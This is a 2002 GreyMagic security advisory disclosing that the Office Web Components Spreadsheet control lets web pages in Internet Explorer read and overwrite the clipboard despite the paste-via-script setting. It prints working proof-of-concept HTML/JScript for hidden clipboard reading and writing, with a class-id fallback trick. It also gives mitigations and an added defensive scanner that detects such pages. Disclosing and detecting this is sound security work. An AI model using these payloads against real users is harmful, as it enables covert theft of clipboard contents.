Controlling the clipboard with OWC in IE (GM#007-IE)

From: GreyMagic Software (security@GREYMAGIC.COM)
Date: 04/08/02


Date:         Mon, 8 Apr 2002 17:21:16 +0200
From: GreyMagic Software <security@GREYMAGIC.COM>
To: NTBUGTRAQ@LISTSERV.NTBUGTRAQ.COM

GreyMagic Security Advisory GM#007-IE
=====================================

By GreyMagic Software, Israel.
08 Apr 2002.

Available in HTML format at http://security.greymagic.com/adv/gm007-ie/.

Topic: Controlling the clipboard with OWC in IE.

Discovery date: 24 Feb 2002.

Affected applications:
======================

* Office 2000 - Office Web Components 9, Spreadsheet component.
* Office XP - Office Web Components 10, Spreadsheet component.

Introduction:
=============

Office Web Components (OWC) is a group of safe for scripting components used
to enrich HTML documents with Spreadsheets, Charts, Pivot tables and more.

OWC ships with the Microsoft Office package, but it is also downloadable as
a separate (free for viewing only) component.

Discussion:
===========

It is well documented that IE lets anybody read and write clipboard data by
default. Until now, it was possible to disable this feature by setting "Allow
paste operations via script" to "Disable".

It is now possible to gain control over the clipboard even when that setting
is disabled in the security zone, via the Spreadsheet component in both OWC9
and OWC10.

The "Paste" method of the Range object and the "Copy" method of the Cell
object both give an attacker full control over clipboard operations.

The attacker can continuously monitor the victim's clipboard and log the
findings to a server for later inspection. It is also possible for an
attacker to place data inside the clipboard.

Exploit:
========

Reading the contents of the clipboard:

<object classid="clsid:0002E510-0000-0000-C000-000000000046" id="oSP"
style="display:none"></object>
<script language="jscript">
onload=function () {
    // Paste to spreadsheet
    oSP.ActiveSheet.UsedRange.Paste();

    // Read the spreadsheet
    var oRng=oSP.ActiveSheet.UsedRange,
        iRows=oRng.Rows.Count,
        iCols=oRng.Columns.Count,
        sRes="";

    for (var iCRow=1;iCRow<=iRows;iCRow++) {
        for (var iCCol=1;iCCol<=iCols;iCCol++) {
            sRes+=(oSP.Cells(iCRow,iCCol).Value || "")+"\t";
        }
        sRes+="\n";
    }

    // Display result
    alert(sRes);
}
</script>

Assigning the clipboard's content:

<object classid="clsid:0002E510-0000-0000-C000-000000000046" id="oSP"
style="display:none"></object>
<script language="jscript">
onload=function () {
    oSP.Cells(1,1).Value="Trustworthy computing";
    oSP.Cells(1,1).Copy();
}
</script>

The class id of the <object> element above is for the spreadsheet component
of OWC9 (Microsoft Office 2000). OWC10's class id is
"0002E551-0000-0000-C000-000000000046"; no further changes in code are
needed.

An attacker can actually use the fallback feature of the <object> element to
include either one of these components:

<!-- Try to include OWC10 -->
<object classid="clsid:0002E551-0000-0000-C000-000000000046" id="oSP10"
style="display:none">
    <!-- Failed, try to include OWC9 -->
    <object classid="clsid:0002E510-0000-0000-C000-000000000046" id="oSP9"
style="display:none">
        <!-- None found -->
        Failed to load any of the spreadsheet components.
    </object>
</object>

Solution:
=========

Set "Run ActiveX controls and plug-ins" to "Disable" or simply
remove/disable OWC until a patch becomes available.

Microsoft has been informed and has opened an investigation regarding this
issue.
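
For defenders reviewing cached or proxied HTML, the following added example
(not part of GreyMagic's advisory) flags pages that embed either Spreadsheet
class id listed above and reports Paste()/Copy() calls made through the
object's id. The function name, field names and sample page are constructed
for illustration.

```javascript
// Added example (not from the advisory): flag HTML that embeds the OWC
// Spreadsheet component and calls its clipboard methods from script.
// The two class ids come from the advisory; all other names are assumptions.
const OWC_SPREADSHEET = {
  "0002E510-0000-0000-C000-000000000046": "OWC9",
  "0002E551-0000-0000-C000-000000000046": "OWC10",
};

function findOwcSpreadsheet(html) {
  const findings = [];
  // Visit every <object> start tag, so nested fallback objects are seen too.
  const tagRe = /<object\b([^>]*)>/gi;
  let m;
  while ((m = tagRe.exec(html)) !== null) {
    const attrs = m[1];
    const cls = /classid\s*=\s*["']?\s*clsid:\s*\{?([0-9a-f-]{36})\}?/i.exec(attrs);
    const component = cls && OWC_SPREADSHEET[cls[1].toUpperCase()];
    if (!component) continue;
    const idMatch = /\bid\s*=\s*["']?(\w+)/i.exec(attrs);
    const id = idMatch ? idMatch[1] : null;
    const hidden = /display\s*:\s*none/i.test(attrs);
    // Collect Paste()/Copy() calls reached through this object's id.
    const clipboardCalls = [];
    if (id) {
      const callRe = new RegExp("\\b" + id + "\\b[^;\\n]*\\.(Paste|Copy)\\s*\\(", "g");
      let c;
      while ((c = callRe.exec(html)) !== null) clipboardCalls.push(c[1]);
    }
    findings.push({ component, id, hidden, clipboardCalls });
  }
  return findings;
}

// Constructed sample page: hidden OWC10 object with an OWC9 fallback.
const SAMPLE_PAGE = `
<object classid="clsid:0002E551-0000-0000-C000-000000000046" id="oSP10"
style="display:none">
  <object classid="CLSID:0002e510-0000-0000-c000-000000000046" id="oSP9"></object>
</object>
<object classid="clsid:00000000-0000-0000-0000-000000000000" id="other"></object>
<script>oSP10.ActiveSheet.UsedRange.Paste();</script>`;

console.log(JSON.stringify(findOwcSpreadsheet(SAMPLE_PAGE), null, 2));
```

This is a static check only: markup written at run time or script that
reaches the object by another reference will not be reported.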

Tested on:
==========

IE5sp2 NT4 sp6a + Office 2000 (OWC9), all patches.
IE5.5sp2 NT4 sp6a + Office 2000 (OWC9), all patches.
IE5.5sp2 NT4 sp6a + OWC10, all patches.
IE6 Win2000 + Office 2000 (OWC9), all patches.
IE6 WinXP + Office XP (OWC10), all patches.

Demonstration:
==============

Fully dynamic proof-of-concept (clipboard monitor and clipboard writer)
demonstrations of this issue are available at
http://security.greymagic.com/adv/gm007-ie/.

Feedback:
=========

Please mail any questions or comments to security@greymagic.com.

- Copyright 2002 GreyMagic Software.


